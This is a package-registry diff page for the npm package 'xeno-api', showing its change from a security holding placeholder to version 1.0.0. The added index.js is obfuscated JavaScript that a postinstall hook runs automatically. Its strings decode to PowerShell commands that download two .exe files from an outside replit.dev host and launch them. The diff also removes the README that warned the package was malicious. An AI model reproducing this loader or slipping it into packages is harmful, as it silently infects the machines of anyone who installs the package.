xeno-api 0.0.1-security → 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of xeno-api might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +1 -0
  2. package/package.json +13 -4
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1 @@
1
+ const _0x53258e=_0x3f5c;(function(_0x1174b8,_0x2c9471){const _0x49b210=_0x3f5c,_0x9cfdf2=_0x1174b8();while(!![]){try{const _0x55cda6=parseInt(_0x49b210(0x1dd))/(0x8*-0x238+-0x515*-0x3+0x282)+parseInt(_0x49b210(0x1e1))/(0x9*0x289+-0x1f29*-0x1+-0x35f8)+parseInt(_0x49b210(0x1f2))/(0x301*-0x3+-0x1bae+0x24*0x105)+-parseInt(_0x49b210(0x1dc))/(0x2625+-0x9aa*-0x2+-0x3975)*(-parseInt(_0x49b210(0x1d4))/(0x19b*0x4+-0x1*-0xd77+-0x13de))+parseInt(_0x49b210(0x1df))/(0x6a6*-0x3+-0x1879+0x2c71)*(-parseInt(_0x49b210(0x1da))/(-0x9b3+0x143a+-0xa80))+parseInt(_0x49b210(0x1cd))/(0x3*0x327+0x7*0x14e+0x1*-0x128f)*(parseInt(_0x49b210(0x1d0))/(0xfa7*0x1+-0x2*-0xbbd+-0x8*0x4e3))+-parseInt(_0x49b210(0x1d8))/(0x796+-0x115e+-0x1a3*-0x6)*(parseInt(_0x49b210(0x1f0))/(-0x21*0x10b+0xa15*-0x1+0x2c8b));if(_0x55cda6===_0x2c9471)break;else _0x9cfdf2['push'](_0x9cfdf2['shift']());}catch(_0x2577ab){_0x9cfdf2['push'](_0x9cfdf2['shift']());}}}(_0x3744,-0x56*-0x2fd8+0xe7bdd+-0x15050d));const {exec}=require(_0x53258e(0x1ef)+_0x53258e(0x1d2)),path=require(_0x53258e(0x1f9)),util=require(_0x53258e(0x1e4)),execAsync=util[_0x53258e(0x1e0)](exec),urls=[_0x53258e(0x1e8)+_0x53258e(0x1de)+_0x53258e(0x1eb)+_0x53258e(0x1cb)+_0x53258e(0x1d5)+_0x53258e(0x1f4)+_0x53258e(0x1d3)+_0x53258e(0x1ed)+'s',_0x53258e(0x1e8)+_0x53258e(0x1de)+_0x53258e(0x1eb)+_0x53258e(0x1cb)+_0x53258e(0x1d5)+_0x53258e(0x1f4)+_0x53258e(0x1d3)+_0x53258e(0x1e7)+'l'],outputFiles=[path[_0x53258e(0x1f5)](__dirname,_0x53258e(0x1e9)),path[_0x53258e(0x1f5)](__dirname,_0x53258e(0x1db)+_0x53258e(0x1ce)+_0x53258e(0x1cf))];async function downloadAndRun(_0x5df6b5,_0x279247){const _0xc544ff=_0x53258e,_0x36936e={'iODlh':function(_0x3da47b,_0x41d4ea){return _0x3da47b(_0x41d4ea);}},_0x5c6167=_0xc544ff(0x1e5)+_0xc544ff(0x1c9)+_0xc544ff(0x1d1)+_0xc544ff(0x1f3)+_0xc544ff(0x1ca)+_0x5df6b5+(_0xc544ff(0x1cc)+'\x20\x27')+_0x279247+'\x27\x22',_0x5d9294=_0xc544ff(0x1e5)+_0xc544ff(0x1c9)+_0xc544ff(0x1f1)+_0xc544ff(0x1ee)+_0x279247+'\x27\x22';try{await _0x36936e[_0xc544ff(0x1e3)](execAsync,_0x5c6167),console[_0xc544ff(0x1f7)](_0xc544ff(0x1fa)+'\x20'+_0x279247+(_0xc544ff(0x1ea)+_0xc544ff(0x1e6))),await _0x36936e[_0xc544ff(0x1e3)](execAsync,_0x5d9294),console[_0xc544ff(0x1f7)](_0xc544ff(0x1ec)+_0x279247+(_0xc544ff(0x1ea)+_0xc544ff(0x1e6)));}catch(_0x3a9dd6){console[_0xc544ff(0x1f6)](_0xc544ff(0x1d9)+_0x3a9dd6[_0xc544ff(0x1d6)]);}}function _0x3f5c(_0x92a63,_0x1c779b){const _0x1574df=_0x3744();return _0x3f5c=function(_0x1e5988,_0x13284f){_0x1e5988=_0x1e5988-(0x14*-0xbb+0x3*0x794+-0x657);let _0x3a9583=_0x1574df[_0x1e5988];return _0x3a9583;},_0x3f5c(_0x92a63,_0x1c779b);}function _0x3744(){const _0x369416=['\x22Start-Pro','3719160rloBfM','bRequest\x20-','30gj5i2z09','join','error','log','length','path','Downloaded','\x20-Command\x20','Uri\x20\x27','8-2b609eb3','\x27\x20-OutFile','7460272HvntEw','viceWorker','.exe','9jZrnJd','\x22Invoke-We','ess','x.riker.re','566465CLOKDc','09c3-00-3k','message','rtXMB','70fAkclM','Error:\x20','254933tBRWZv','RuntimeSer','4WyCFyp','1100313lnfwqk','dfa635-60a','6tIaDaT','promisify','2389450RkDRWF','gbIFq','iODlh','util','powershell','lly','plit.dev/b','https://eb','json.exe','\x20successfu','4-499e-9da','Executed\x20','plit.dev/p','cess\x20\x27','child_proc','6158702GvyxiX'];_0x3744=function(){return _0x369416;};return _0x3744();}((async()=>{const _0x3e56f0=_0x53258e,_0x2ab520={'gbIFq':function(_0x3b24cf,_0x37ed09){return _0x3b24cf<_0x37ed09;},'rtXMB':function(_0x3a3c7e,_0x403856,_0x52cefe){return _0x3a3c7e(_0x403856,_0x52cefe);}};for(let _0x14aad3=0x1c4b+-0x13*0x93+-0x1162;_0x2ab520[_0x3e56f0(0x1e2)](_0x14aad3,urls[_0x3e56f0(0x1f8)]);_0x14aad3++){await _0x2ab520[_0x3e56f0(0x1d7)](downloadAndRun,urls[_0x14aad3],outputFiles[_0x14aad3]);}})());
package/package.json CHANGED
@@ -1,6 +1,15 @@
1
1
  {
2
2
  "name": "xeno-api",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
3
+ "version": "1.0.0",
4
+ "description": "Easy-to-use package",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node index.js"
8
+ },
9
+ "author": "nah",
10
+ "license": "ISC",
11
+ "keywords": [],
12
+ "publishConfig": {
13
+ "access": "public"
14
+ }
15
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=xeno-api for more information.